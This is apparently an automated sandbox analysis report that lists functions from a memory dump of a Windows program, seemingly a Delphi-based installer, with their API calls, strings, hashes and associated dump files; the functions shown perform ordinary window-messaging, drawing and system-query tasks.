String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: e586942a625374e7388fa8e48cf53e866a80424edc01312fdbe2f7389893f22f
Instruction ID: 295b97ce7fe51e24737f2dd7b077baf14684f08aaa384b172783a7c5d2e1a860
Opcode Fuzzy Hash: e586942a625374e7388fa8e48cf53e866a80424edc01312fdbe2f7389893f22f
Instruction Fuzzy Hash: 02416A74604248AFD701DF69C886F9DBBE5AF05304F4584ADF9049B392CB789E44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004B209C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,?,?), ref: 004B20ED

Part of subcall function 0047BEA4: GetWindowTextW.USER32 ref: 0047BED3

Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32 ref: 00470C53
Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59

Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004B2150
TranslateMessage.USER32(?), ref: 004B216E
DispatchMessageW.USER32 ref: 004B2177

Strings

[Paused] , xrefs: 004B212B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
String ID: [Paused]
API String ID: 1007367021-4230553315
Opcode ID: 59847d1b00851b109f4416c7ca189fdc09950ec846a4654f7f5f0f8d12dba1dd
Instruction ID: f7876955be2cb41d1d2257ae62b8880ba0ac7922f68f73269f2cb01262406678
Opcode Fuzzy Hash: 59847d1b00851b109f4416c7ca189fdc09950ec846a4654f7f5f0f8d12dba1dd
Instruction Fuzzy Hash: 4D31B030904248AEDB11EBB9CD81BDE7BF8EB09304F5584A6F500E3291DBB89D04DB39

Uniqueness

Uniqueness Score: -1.00%

Function 004D85EC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004D84C0: GetWindowThreadProcessId.USER32(00000000), ref: 004D84C8
Part of subcall function 004D84C0: GetModuleHandleW.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004D8612), ref: 004D84DB

SendMessageW.USER32(00000000,0000004A,00000000,?), ref: 004D8620
GetTickCount.KERNEL32 ref: 004D8669
GetTickCount.KERNEL32 ref: 004D8673
MsgWaitForMultipleObjects.USER32 ref: 004D86C8

Strings

CallSpawnServer: Unexpected status: %d, xrefs: 004D86B1
CallSpawnServer: Unexpected response: $%x, xrefs: 004D8659

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$HandleMessageModuleMultipleObjectsProcessSendThreadWaitWindow
String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
API String ID: 3435664039-3771334282
Opcode ID: f1cf548f9a9d6373fe6094eb515c37cea11acd85bcd883770a6df64ef5c28005
Instruction ID: 19c10b48808156fa50d9852dfbade8b9ec1576fde4ea793c6193966268b70ac1
Opcode Fuzzy Hash: f1cf548f9a9d6373fe6094eb515c37cea11acd85bcd883770a6df64ef5c28005
Instruction Fuzzy Hash: 4931C174A102155BCB10EBB9C8967BEB7E1AF58304F10853FB188EB392DA7C8D008799

Uniqueness

Uniqueness Score: -1.00%

Function 0046D040, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 0041253C: GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00412612), ref: 0041257E
Part of subcall function 0041253C: GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125B3
Part of subcall function 0041253C: VerQueryValueW.VERSION(?,00412624,?,?,00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125CD

GetModuleHandleW.KERNEL32(comctl32.dll), ref: 0046D074

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

ImageList_Write.COMCTL32(00000000,?,00000000,0046D13A), ref: 0046D104

Strings

comctl32.dll, xrefs: 0046D054
0B, xrefs: 0046D0E0, 0046D115
ImageList_WriteEx, xrefs: 0046D07F
comctl32.dll, xrefs: 0046D06F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
String ID: 0B$ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 4063495462-3856334682
Opcode ID: b021a58b9619bb2706f66a467b1ea21dbf92dae369d0f79f86c71e990ee7a02d
Instruction ID: 5237d21f56526580522d95e3f5c22925f03333b92e4ddc9e0fac8314b13122c4
Opcode Fuzzy Hash: b021a58b9619bb2706f66a467b1ea21dbf92dae369d0f79f86c71e990ee7a02d
Instruction Fuzzy Hash: 86216270F402009BEB14AF76DD95B6B36A8EB59708F50013AF401D73A2EB799C45DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004D8D84, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DB0
GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DC9
CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DF3
CloseHandle.KERNEL32(00000000), ref: 004D8E11

Strings

GetFinalPathNameByHandleW, xrefs: 004D8DA6
kernel32.dll, xrefs: 004D8DAB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandle$AttributesCloseCreateModule
String ID: GetFinalPathNameByHandleW$kernel32.dll
API String ID: 791737717-340263132
Opcode ID: 42b29d4e707f7d7eaf684b16cac7e922bfa3c36ce97cb3d33e5a737aac71c7ae
Instruction ID: 6eba4a4fa280df9203778175666092d8d09e2161eb6eb13b461aa55ad8284538
Opcode Fuzzy Hash: 42b29d4e707f7d7eaf684b16cac7e922bfa3c36ce97cb3d33e5a737aac71c7ae
Instruction Fuzzy Hash: 9611A1A17407083AE520316A4C97F7B228C8B5176CF14093FBB18EA3D3EDBD9C02466E

Uniqueness

Uniqueness Score: -1.00%

Function 0042DE14, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0042DE6C
GetSystemMetrics.USER32 ref: 0042DE81
GetSystemMetrics.USER32 ref: 0042DE8C
lstrcpyW.KERNEL32 ref: 0042DEB6

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

Strings

DISPLAY, xrefs: 0042DEAD
GetMonitorInfoA, xrefs: 0042DE2C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 0334af3791ca62d81c8f9f5ce90da1c1f0b011aef06e85ec219d068396a30baa
Instruction ID: e690db379b360be8035375c306f1954558621b1b4093ea6aaf1bcb1541f2fec9
Opcode Fuzzy Hash: 0334af3791ca62d81c8f9f5ce90da1c1f0b011aef06e85ec219d068396a30baa
Instruction Fuzzy Hash: 8211A231B01B249FD7209F60EC447ABB7A9FF25710F41492AE9569B280D7B4A8088765

Uniqueness

Uniqueness Score: -1.00%

Function 0042DF04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0042DF5C
GetSystemMetrics.USER32 ref: 0042DF71
GetSystemMetrics.USER32 ref: 0042DF7C
lstrcpyW.KERNEL32 ref: 0042DFA6

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

Strings

DISPLAY, xrefs: 0042DF9D
GetMonitorInfoW, xrefs: 0042DF1C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: 3e9f6e86240fb2a71e1c9de38d2c020a4f78943b31431b8fdbf65326cccb383b
Instruction ID: 84edf9fb7463b4be4b191504fda9a04e2f169d7f8fe1acd0c1031d1866ba9900
Opcode Fuzzy Hash: 3e9f6e86240fb2a71e1c9de38d2c020a4f78943b31431b8fdbf65326cccb383b
Instruction Fuzzy Hash: AB11D332B003249FD720DF60ED44BABB7A9EB05710F41452EF84697280E7B4A849CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00434340, Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 004330E8: GetObjectW.GDI32(00000000,00000004,?,000000FF,00000000,00000018,00000000,0043464A,00000000,004347A0,?,00000000,00434A96,?,00000000,00000000), ref: 004330FF
Part of subcall function 004330E8: GetPaletteEntries.GDI32(00000000,00000000,?,00000028), ref: 00433122

GetDC.USER32(00000000), ref: 0043437E
CreateCompatibleDC.GDI32(?), ref: 0043438A
SelectObject.GDI32(?), ref: 00434397
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,004343EF,?,?,?,?,00000000), ref: 004343BB
SelectObject.GDI32(?,?), ref: 004343D5
DeleteDC.GDI32(?), ref: 004343DE
ReleaseDC.USER32 ref: 004343E9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 4cc14c19a4e107e091eca515082334aab6debb1a019eb6af870d7d8d2492fed7
Instruction ID: ac795cd6fd40d748ce50fe862934118e8cfa46c4ed00d813a7174b02b8df3c14
Opcode Fuzzy Hash: 4cc14c19a4e107e091eca515082334aab6debb1a019eb6af870d7d8d2492fed7
Instruction Fuzzy Hash: B3112771E442596BDB10DBE9C851AAEB3FCEB48704F40446AB904E7292D7799D408B64

Uniqueness

Uniqueness Score: -1.00%

Function 0042AB6C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66threadsynchronizationwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0042AB97
PeekMessageW.USER32 ref: 0042ABC3
MsgWaitForMultipleObjects.USER32 ref: 0042ABD8
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0042AC05
GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 0042AC10

Strings

<`P, xrefs: 0042AB9C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
String ID: <`P
API String ID: 1797888035-3701931957
Opcode ID: 125860f8302aaf33a9bed9946090f2c21a5a925b1f2938784279cfbef493fb56
Instruction ID: 7964f1d78324b9a64a1f92550013217c3c94e1c751d8d64debe9312779c8cfa5
Opcode Fuzzy Hash: 125860f8302aaf33a9bed9946090f2c21a5a925b1f2938784279cfbef493fb56
Instruction Fuzzy Hash: B011D3717403506BC610EB7ADCC2F5E37C8AB54714F90492AFA50E72D2D678EC44C74A

Uniqueness

Uniqueness Score: -1.00%

Function 004E6C44, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 58registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004E6CF9), ref: 004E6CDE

Strings

WinNT, xrefs: 004E6C8E
ProductType, xrefs: 004E6C7D
LanmanNT, xrefs: 004E6CA8
ServerNT, xrefs: 004E6CC2
System\CurrentControlSet\Control\ProductOptions, xrefs: 004E6C65

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: deb2e3bef5122bc304c75531284faf1f998d74d5bcb0300c774c89aad335406c
Instruction ID: c72522c64d7d6bac56bb35a9e690e774e2da7e7e031701de4d5371f8d5070e34
Opcode Fuzzy Hash: deb2e3bef5122bc304c75531284faf1f998d74d5bcb0300c774c89aad335406c
Instruction Fuzzy Hash: 4311B670704288DBDB01D7A6CD16B9F76A9DB61385FA280BBE840D7281D73CDD059308

Uniqueness

Uniqueness Score: -1.00%

Function 00479CA8, Relevance: 10.6, APIs: 7, Instructions: 58threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00479CC3
WindowFromPoint.USER32(?,?), ref: 00479CD0
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00479CDE
GetCurrentThreadId.KERNEL32 ref: 00479CE5
SendMessageW.USER32(00000000,00000084,00000000,00000000), ref: 00479D08
SendMessageW.USER32(00000000,00000020,00000000,?), ref: 00479D1A
SetCursor.USER32(00000000), ref: 00479D2C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: ff1185d674757ab3b9ef60e383ae3b7c63297c5a40e9b5ff030af99f3c7da1ce
Instruction ID: 97ca84ce4c1aebd87a25af4c1893583fe9b9bd09de5401689dcde1498ece8cf0
Opcode Fuzzy Hash: ff1185d674757ab3b9ef60e383ae3b7c63297c5a40e9b5ff030af99f3c7da1ce
Instruction Fuzzy Hash: 7E01B52220420166EA357A658D86FBF2768DFC1B54F50893BB948AA2C3D63DCC01527D

Uniqueness

Uniqueness Score: -1.00%

Function 004FAAD8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004FAAE9
SelectObject.GDI32(00000000,00000000), ref: 004FAB0B
GetTextExtentPointW.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,004FB0E7), ref: 004FAB1F
GetTextMetricsW.GDI32(00000000,?,00000000,00000000,00000000,004FAB64,?,00000000,?,?,00000000), ref: 004FAB41
ReleaseDC.USER32 ref: 004FAB5E

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004FAB16

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ExtentMetricsObjectPointReleaseSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 844173074-222967699
Opcode ID: 8309e9a8a614fc4a65d7e0e1d7563ea021e4adc4a3ef1e4eb57e24d4c1d208bb
Instruction ID: eb33620f4a528fa46cfba91873aaab3ace2be4745cc87c30a72d5d013b15cb52
Opcode Fuzzy Hash: 8309e9a8a614fc4a65d7e0e1d7563ea021e4adc4a3ef1e4eb57e24d4c1d208bb
Instruction Fuzzy Hash: 1D0161B6B04248AFDB04DBE9CC41E6EB7FDDB48704F150476F604E3292D678AE108B28

Uniqueness

Uniqueness Score: -1.00%

Function 00445060, Relevance: 9.3, APIs: 6, Instructions: 312windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004450CB
GetTickCount.KERNEL32 ref: 004450F3
SendMessageW.USER32(00000000,0000014E,000000FF,00000000), ref: 004451F1
SendMessageW.USER32(00000000,00000142,00000000,?), ref: 00445242

Part of subcall function 00444FBC: SendMessageW.USER32(00000000,0000014E,000000FF,00000000), ref: 00445007
Part of subcall function 00444FBC: SendMessageW.USER32(00000000,00000142,00000000), ref: 00445038

PeekMessageW.USER32 ref: 0044539D
PeekMessageW.USER32 ref: 004453EB

Part of subcall function 00443CE8: SendMessageW.USER32(00000000,00000157,00000000,00000000), ref: 00443CFC

Part of subcall function 00443D0C: SendMessageW.USER32(00000000,0000014F,?,00000000), ref: 00443D28
Part of subcall function 00443D0C: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 00443D45

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$CountPeekTick$InvalidateRect
String ID:
API String ID: 2065907832-0
Opcode ID: 270576de5018feed43711c8cf3448b9f4a7ea8b39d86ea297675b7ec15ae7087
Instruction ID: 4935a95f5f9f0fc0471dd3d68f2c1ed0c1230899b77a5c0847095f64fbc7b65c
Opcode Fuzzy Hash: 270576de5018feed43711c8cf3448b9f4a7ea8b39d86ea297675b7ec15ae7087
Instruction Fuzzy Hash: 2DC15530A005099BEF00DB95C985BEEB3B5EF44704F244567E401BB397D778AE46DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0047658C, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431F94
Part of subcall function 00431F8C: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FA1
Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(?,0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FAA

SaveDC.GDI32(?), ref: 004765D9
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00476654
GetStockObject.GDI32(00000004), ref: 00476673
FillRect.USER32 ref: 0047668C
RestoreDC.GDI32(?,?), ref: 00476702

Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA

SetBkColor.GDI32(00000000,00000000), ref: 004766D7

Part of subcall function 00431E8C: FillRect.USER32 ref: 00431EB5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
